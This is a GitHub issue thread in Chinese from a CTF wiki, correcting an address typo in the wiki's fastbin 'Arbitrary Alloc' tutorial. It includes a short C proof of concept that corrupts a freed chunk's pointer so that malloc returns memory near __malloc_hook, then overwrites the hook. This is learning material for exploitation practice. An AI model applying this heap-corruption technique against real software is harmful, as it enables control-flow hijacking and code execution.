### ISSUE TITLE
fastbin attack中的Arbitrary Alloc部分问题

### ISSUE THREAD

**Issue by littleworldwar** [ctf-wiki/ctf-wiki#257]
__malloc_hook地址是0x7ffff7dd1b10
`0x7ffff7dd1b10 <__malloc_hook>`

经过伪造size最后malloc分配到的chunk地址是`0x00007ffff7dd1b15` 不能完全的控制__malloc_hook的地址,也就不能劫持malloc了。 不知道是不是我哪里理解有问题
我换用了另一个地址
```
int main(void)
{
    void *chunk1;
    void *chunk_a;

    chunk1=malloc(0x60);
    free(chunk1);

    *(long long *)chunk1=0x7ffff7dd1aed;
    malloc(0x60);
    chunk_a=malloc(0x60);
    strcpy(chunk_a,"AAAAAAAAAAAAAAAAAAACCCCCCCC");
    malloc(10);
    return 0;
}
```
可以覆盖__malloc_hook为CCCCCCCC

**Comment by iromise** [comment]
对，确实这里写得有些问题（可能是他的意思是这里可以控制部分 __malloc_hook 的内容吧）。 @vbty ，你看下当时你是怎么想的？

**Comment by iromise** [comment]
解决问题的速度可能有点慢，，希望可以理解，这个取决于每个人的具体时间，，

**Comment by vbty** [comment]
"通过观察发现 0x7ffff7dd1af5 处可以现实错位构造出一个0x000000000000007f"

我想写的是0x7ffff7dd1af5，写成0x7ffff7dd1b05了。因为unsigned int是4个字节所以恰巧也可以分配，其实是笔误
